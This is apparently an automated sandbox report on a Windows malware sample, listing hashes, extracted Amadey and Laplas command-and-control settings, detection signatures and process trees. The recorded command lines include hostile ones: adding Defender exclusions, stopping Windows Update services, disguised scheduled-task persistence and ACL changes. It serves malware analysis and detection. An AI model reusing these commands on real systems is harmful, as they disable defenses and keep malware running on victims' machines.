Analysis
-
max time kernel
227s -
max time network
303s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system -
submitted
26-07-2023 04:47
Behavioral task
behavioral1
Sample
1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff.exe
Resource
win7-20230712-en
General
-
Target
1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff.exe
-
Size
4.7MB
-
MD5
ede69e83b96e9bd7bbb4f4decd11e817
-
SHA1
1209597f9e6060b52a6e06ee95eec1c57257eeca
-
SHA256
1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff
-
SHA512
8338b9240416577681baf3c49d7e9bfc27bd4a4b62f58b3142c032e0dcf7876a77769b946a88f45e55f6e5ac0bb7e29c66d9f812bec175baf65284457acda696
-
SSDEEP
98304:kX31mbIn5+7fqIKrwL/w4/0zDx+KTGT+C2ZHHUz+OBlMEuvl:kXl0o5afPD/F/0HkKTG+fniJ
Malware Config
Extracted
amadey
3.80
45.15.156.208/jd9dd3Vw/index.php
second.amadgood.com/jd9dd3Vw/index.php
Extracted
laplas
http://206.189.229.43
-
api_key
f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
description pid Process procid_target PID 2992 created 1208 2992 rdpcllp.exe 13 PID 2992 created 1208 2992 rdpcllp.exe 13 PID 2992 created 1208 2992 rdpcllp.exe 13 PID 2992 created 1208 2992 rdpcllp.exe 13 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ taskhostclp.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rdpcllp.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ntlhost.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts rdpcllp.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rdpcllp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rdpcllp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ntlhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ntlhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion taskhostclp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion taskhostclp.exe -
Executes dropped EXE 8 IoCs
pid Process 2124 oneetx.exe 1868 oneetx.exe 2664 oneetx.exe 896 oneetx.exe 2172 taskhostclp.exe 2992 rdpcllp.exe 2956 ntlhost.exe 2296 oneetx.exe -
Loads dropped DLL 4 IoCs
pid Process 2336 1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff.exe 2124 oneetx.exe 2124 oneetx.exe 2172 taskhostclp.exe -
resource yara_rule behavioral1/files/0x0005000000018fb3-279.dat themida behavioral1/files/0x0005000000018fb3-286.dat themida behavioral1/files/0x0005000000018fb3-288.dat themida behavioral1/memory/2992-291-0x000000013FDD0000-0x0000000140D0D000-memory.dmp themida behavioral1/memory/2992-314-0x000000013FDD0000-0x0000000140D0D000-memory.dmp themida behavioral1/files/0x0005000000018fb3-409.dat themida behavioral1/memory/2992-413-0x000000013FDD0000-0x0000000140D0D000-memory.dmp themida behavioral1/files/0x0007000000018fcd-415.dat themida behavioral1/memory/2036-416-0x000000013F3B0000-0x00000001402ED000-memory.dmp themida behavioral1/files/0x0007000000018fcd-418.dat themida behavioral1/files/0x0007000000018fcd-456.dat themida -
resource yara_rule behavioral1/memory/2336-56-0x0000000000C30000-0x00000000013D9000-memory.dmp vmprotect behavioral1/memory/2336-59-0x0000000000C30000-0x00000000013D9000-memory.dmp vmprotect behavioral1/files/0x000b000000012298-94.dat vmprotect behavioral1/files/0x000b000000012298-95.dat vmprotect behavioral1/files/0x000b000000012298-96.dat vmprotect behavioral1/memory/2336-98-0x0000000000C30000-0x00000000013D9000-memory.dmp vmprotect behavioral1/memory/2124-101-0x0000000000C10000-0x00000000013B9000-memory.dmp vmprotect behavioral1/memory/2124-104-0x0000000000C10000-0x00000000013B9000-memory.dmp vmprotect behavioral1/files/0x000b000000012298-134.dat vmprotect behavioral1/memory/2124-147-0x0000000000C10000-0x00000000013B9000-memory.dmp vmprotect behavioral1/memory/2124-148-0x0000000000C10000-0x00000000013B9000-memory.dmp vmprotect behavioral1/files/0x000b000000012298-149.dat vmprotect behavioral1/memory/1868-152-0x0000000000C10000-0x00000000013B9000-memory.dmp vmprotect behavioral1/memory/1868-155-0x0000000000C10000-0x00000000013B9000-memory.dmp vmprotect behavioral1/memory/1868-185-0x0000000000C10000-0x00000000013B9000-memory.dmp vmprotect behavioral1/files/0x000b000000012298-186.dat vmprotect behavioral1/memory/2664-189-0x0000000000C10000-0x00000000013B9000-memory.dmp vmprotect behavioral1/memory/2664-192-0x0000000000C10000-0x00000000013B9000-memory.dmp vmprotect behavioral1/memory/2664-222-0x0000000000C10000-0x00000000013B9000-memory.dmp vmprotect behavioral1/files/0x000b000000012298-223.dat vmprotect behavioral1/memory/896-226-0x0000000000C10000-0x00000000013B9000-memory.dmp vmprotect behavioral1/memory/896-229-0x0000000000C10000-0x00000000013B9000-memory.dmp vmprotect behavioral1/memory/896-259-0x0000000000C10000-0x00000000013B9000-memory.dmp vmprotect behavioral1/files/0x000b000000012298-349.dat vmprotect behavioral1/memory/2296-365-0x0000000000C10000-0x00000000013B9000-memory.dmp vmprotect behavioral1/memory/2296-362-0x0000000000C10000-0x00000000013B9000-memory.dmp vmprotect behavioral1/memory/2296-400-0x0000000000C10000-0x00000000013B9000-memory.dmp vmprotect behavioral1/files/0x000b000000012298-463.dat vmprotect -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000\Software\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" taskhostclp.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ntlhost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA taskhostclp.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA rdpcllp.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
pid Process 2172 taskhostclp.exe 2992 rdpcllp.exe 2956 ntlhost.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2544 sc.exe 1988 sc.exe 2056 sc.exe 1672 sc.exe 2508 sc.exe 2272 sc.exe 240 sc.exe 1548 sc.exe 1708 sc.exe 2008 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2632 schtasks.exe 1704 schtasks.exe 1156 schtasks.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 10 Go-http-client/1.1 -
Suspicious behavior: EnumeratesProcesses 16 IoCs
pid Process 2336 1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff.exe 2124 oneetx.exe 1868 oneetx.exe 2664 oneetx.exe 896 oneetx.exe 2992 rdpcllp.exe 2992 rdpcllp.exe 2976 powershell.exe 2992 rdpcllp.exe 2992 rdpcllp.exe 2296 oneetx.exe 2992 rdpcllp.exe 2992 rdpcllp.exe 2992 rdpcllp.exe 2992 rdpcllp.exe 2660 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2976 powershell.exe Token: SeShutdownPrivilege 1388 powercfg.exe Token: SeDebugPrivilege 2660 powershell.exe Token: SeShutdownPrivilege 1860 powercfg.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2336 1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2336 wrote to memory of 2124 2336 1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff.exe 28 PID 2336 wrote to memory of 2124 2336 1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff.exe 28 PID 2336 wrote to memory of 2124 2336 1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff.exe 28 PID 2336 wrote to memory of 2124 2336 1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff.exe 28 PID 2124 wrote to memory of 2632 2124 oneetx.exe 29 PID 2124 wrote to memory of 2632 2124 oneetx.exe 29 PID 2124 wrote to memory of 2632 2124 oneetx.exe 29 PID 2124 wrote to memory of 2632 2124 oneetx.exe 29 PID 2124 wrote to memory of 2432 2124 oneetx.exe 31 PID 2124 wrote to memory of 2432 2124 oneetx.exe 31 PID 2124 wrote to memory of 2432 2124 oneetx.exe 31 PID 2124 wrote to memory of 2432 2124 oneetx.exe 31 PID 2432 wrote to memory of 1384 2432 cmd.exe 33 PID 2432 wrote to memory of 1384 2432 cmd.exe 33 PID 2432 wrote to memory of 1384 2432 cmd.exe 33 PID 2432 wrote to memory of 1384 2432 cmd.exe 33 PID 2432 wrote to memory of 1636 2432 cmd.exe 34 PID 2432 wrote to memory of 1636 2432 cmd.exe 34 PID 2432 wrote to memory of 1636 2432 cmd.exe 34 PID 2432 wrote to memory of 1636 2432 cmd.exe 34 PID 2432 wrote to memory of 2596 2432 cmd.exe 35 PID 2432 wrote to memory of 2596 2432 cmd.exe 35 PID 2432 wrote to memory of 2596 2432 cmd.exe 35 PID 2432 wrote to memory of 2596 2432 cmd.exe 35 PID 2432 wrote to memory of 1828 2432 cmd.exe 36 PID 2432 wrote to memory of 1828 2432 cmd.exe 36 PID 2432 wrote to memory of 1828 2432 cmd.exe 36 PID 2432 wrote to memory of 1828 2432 cmd.exe 36 PID 2432 wrote to memory of 3036 2432 cmd.exe 37 PID 2432 wrote to memory of 3036 2432 cmd.exe 37 PID 2432 wrote to memory of 3036 2432 cmd.exe 37 PID 2432 wrote to memory of 3036 2432 cmd.exe 37 PID 2432 wrote to memory of 3040 2432 cmd.exe 38 PID 2432 wrote to memory of 3040 2432 cmd.exe 38 PID 2432 wrote to memory of 3040 2432 cmd.exe 38 PID 2432 wrote to memory of 3040 2432 cmd.exe 38 PID 1784 wrote to memory of 1868 1784 taskeng.exe 44 PID 1784 wrote to memory of 1868 1784 taskeng.exe 44 PID 1784 wrote to memory of 1868 1784 taskeng.exe 44 PID 1784 wrote to memory of 1868 1784 taskeng.exe 44 PID 1784 wrote to memory of 2664 1784 taskeng.exe 45 PID 1784 wrote to memory of 2664 1784 taskeng.exe 45 PID 1784 wrote to memory of 2664 1784 taskeng.exe 45 PID 1784 wrote to memory of 2664 1784 taskeng.exe 45 PID 1784 wrote to memory of 896 1784 taskeng.exe 46 PID 1784 wrote to memory of 896 1784 taskeng.exe 46 PID 1784 wrote to memory of 896 1784 taskeng.exe 46 PID 1784 wrote to memory of 896 1784 taskeng.exe 46 PID 2124 wrote to memory of 2172 2124 oneetx.exe 47 PID 2124 wrote to memory of 2172 2124 oneetx.exe 47 PID 2124 wrote to memory of 2172 2124 oneetx.exe 47 PID 2124 wrote to memory of 2172 2124 oneetx.exe 47 PID 2124 wrote to memory of 2992 2124 oneetx.exe 49 PID 2124 wrote to memory of 2992 2124 oneetx.exe 49 PID 2124 wrote to memory of 2992 2124 oneetx.exe 49 PID 2124 wrote to memory of 2992 2124 oneetx.exe 49 PID 2172 wrote to memory of 2956 2172 taskhostclp.exe 50 PID 2172 wrote to memory of 2956 2172 taskhostclp.exe 50 PID 2172 wrote to memory of 2956 2172 taskhostclp.exe 50 PID 1784 wrote to memory of 2296 1784 taskeng.exe 53 PID 1784 wrote to memory of 2296 1784 taskeng.exe 53 PID 1784 wrote to memory of 2296 1784 taskeng.exe 53 PID 1784 wrote to memory of 2296 1784 taskeng.exe 53 PID 2460 wrote to memory of 2544 2460 cmd.exe 56
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1208
-
C:\Users\Admin\AppData\Local\Temp\1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff.exe"C:\Users\Admin\AppData\Local\Temp\1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff.exe"2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2336 -
C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe"C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2124 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe" /F4⤵
- Creates scheduled task(s)
PID:2632
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\eb0f58bce7" /P "Admin:N"&&CACLS "..\eb0f58bce7" /P "Admin:R" /E&&Exit4⤵
- Suspicious use of WriteProcessMemory
PID:2432 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:1384
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "oneetx.exe" /P "Admin:N"5⤵PID:1636
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "oneetx.exe" /P "Admin:R" /E5⤵PID:2596
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:1828
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\eb0f58bce7" /P "Admin:N"5⤵PID:3036
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\eb0f58bce7" /P "Admin:R" /E5⤵PID:3040
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe"C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exeC:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2956
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe"C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2992
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2976
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:2460 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2544
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2272
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1988
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:240
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2056
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2660 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:1704
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:1048
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1388
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1860
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:812
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:828
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:2540
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵PID:936
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:1916
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1672
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1548
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1708
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2008
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2508
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:904
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:2404
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:2216
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:2576
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:1940
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵PID:2440
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:1156
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:1684
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:2192
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {C1D7B51C-4B78-4920-816D-9A84B64D2D03} S-1-5-21-722410544-1258951091-1992882075-1000:MGKTNXNO\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:1784 -
C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exeC:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1868
-
-
C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exeC:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2664
-
-
C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exeC:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:896
-
-
C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exeC:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2296
-
-
C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exeC:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe2⤵PID:2924
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {B107125E-6E02-41D5-8259-F2006115F2D8} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2036
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵PID:436
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8.8MB
MD5923c6fc5c9308f77104baa7fe9a20ab9
SHA1b4f77042dfc217ad608ebc2ba858b848c90e11cd
SHA2566d760f4dcba7c4b6242c3edfb6250d56ca62412dc73c34d1c849a28781c1e2d3
SHA512b0f8d494c0108a2ce753619715e51fc4aba0ef5f70db21420b9c1cf7209dccafc3dfebb538c6314e54ffb8a3555822c55e7f57ecf33ec5838258f4eaa267defd
-
Filesize
8.8MB
MD5923c6fc5c9308f77104baa7fe9a20ab9
SHA1b4f77042dfc217ad608ebc2ba858b848c90e11cd
SHA2566d760f4dcba7c4b6242c3edfb6250d56ca62412dc73c34d1c849a28781c1e2d3
SHA512b0f8d494c0108a2ce753619715e51fc4aba0ef5f70db21420b9c1cf7209dccafc3dfebb538c6314e54ffb8a3555822c55e7f57ecf33ec5838258f4eaa267defd
-
Filesize
3.8MB
MD59b79f724b8ed77f9e3ce6a71b4cf909d
SHA1455751b77ffb738d260c6388f191aa590c40eb50
SHA256b95ae0c815dc8fc44d8c8bbde1e853b96c3e1389fb30bcdf1d68f8e6a74b3106
SHA5120feb6c94b6c8fbceb8e63b0629e33d72c6080003203080b7d376a0bdf3f1a3a170bd19e1ce81ba284ea15d96414f57031361ac3dbbadf3c13090d86798906fad
-
Filesize
3.8MB
MD59b79f724b8ed77f9e3ce6a71b4cf909d
SHA1455751b77ffb738d260c6388f191aa590c40eb50
SHA256b95ae0c815dc8fc44d8c8bbde1e853b96c3e1389fb30bcdf1d68f8e6a74b3106
SHA5120feb6c94b6c8fbceb8e63b0629e33d72c6080003203080b7d376a0bdf3f1a3a170bd19e1ce81ba284ea15d96414f57031361ac3dbbadf3c13090d86798906fad
-
Filesize
3.8MB
MD59b79f724b8ed77f9e3ce6a71b4cf909d
SHA1455751b77ffb738d260c6388f191aa590c40eb50
SHA256b95ae0c815dc8fc44d8c8bbde1e853b96c3e1389fb30bcdf1d68f8e6a74b3106
SHA5120feb6c94b6c8fbceb8e63b0629e33d72c6080003203080b7d376a0bdf3f1a3a170bd19e1ce81ba284ea15d96414f57031361ac3dbbadf3c13090d86798906fad
-
Filesize
8.8MB
MD5923c6fc5c9308f77104baa7fe9a20ab9
SHA1b4f77042dfc217ad608ebc2ba858b848c90e11cd
SHA2566d760f4dcba7c4b6242c3edfb6250d56ca62412dc73c34d1c849a28781c1e2d3
SHA512b0f8d494c0108a2ce753619715e51fc4aba0ef5f70db21420b9c1cf7209dccafc3dfebb538c6314e54ffb8a3555822c55e7f57ecf33ec5838258f4eaa267defd
-
Filesize
8.8MB
MD5923c6fc5c9308f77104baa7fe9a20ab9
SHA1b4f77042dfc217ad608ebc2ba858b848c90e11cd
SHA2566d760f4dcba7c4b6242c3edfb6250d56ca62412dc73c34d1c849a28781c1e2d3
SHA512b0f8d494c0108a2ce753619715e51fc4aba0ef5f70db21420b9c1cf7209dccafc3dfebb538c6314e54ffb8a3555822c55e7f57ecf33ec5838258f4eaa267defd
-
Filesize
8.8MB
MD5923c6fc5c9308f77104baa7fe9a20ab9
SHA1b4f77042dfc217ad608ebc2ba858b848c90e11cd
SHA2566d760f4dcba7c4b6242c3edfb6250d56ca62412dc73c34d1c849a28781c1e2d3
SHA512b0f8d494c0108a2ce753619715e51fc4aba0ef5f70db21420b9c1cf7209dccafc3dfebb538c6314e54ffb8a3555822c55e7f57ecf33ec5838258f4eaa267defd
-
Filesize
72KB
MD5952626c44992eb05c992a211e4ca6cc0
SHA166bc05850f633d11ef1cc9f071ce79a99f4e0284
SHA2565724ec4bf056aae4ad2221a8777f65dd0887c05f5a62e292788b657159508d0a
SHA51232453a1233427be0fa05b7cbf6645893839458809345dc49e374ee722f1d74d30e99af30ab88363acb74bcefe5c624c69098dfc1c5b9afaef54ad4b9dc7235fa
-
Filesize
4.7MB
MD5ede69e83b96e9bd7bbb4f4decd11e817
SHA11209597f9e6060b52a6e06ee95eec1c57257eeca
SHA2561002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff
SHA5128338b9240416577681baf3c49d7e9bfc27bd4a4b62f58b3142c032e0dcf7876a77769b946a88f45e55f6e5ac0bb7e29c66d9f812bec175baf65284457acda696
-
Filesize
4.7MB
MD5ede69e83b96e9bd7bbb4f4decd11e817
SHA11209597f9e6060b52a6e06ee95eec1c57257eeca
SHA2561002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff
SHA5128338b9240416577681baf3c49d7e9bfc27bd4a4b62f58b3142c032e0dcf7876a77769b946a88f45e55f6e5ac0bb7e29c66d9f812bec175baf65284457acda696
-
Filesize
4.7MB
MD5ede69e83b96e9bd7bbb4f4decd11e817
SHA11209597f9e6060b52a6e06ee95eec1c57257eeca
SHA2561002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff
SHA5128338b9240416577681baf3c49d7e9bfc27bd4a4b62f58b3142c032e0dcf7876a77769b946a88f45e55f6e5ac0bb7e29c66d9f812bec175baf65284457acda696
-
Filesize
4.7MB
MD5ede69e83b96e9bd7bbb4f4decd11e817
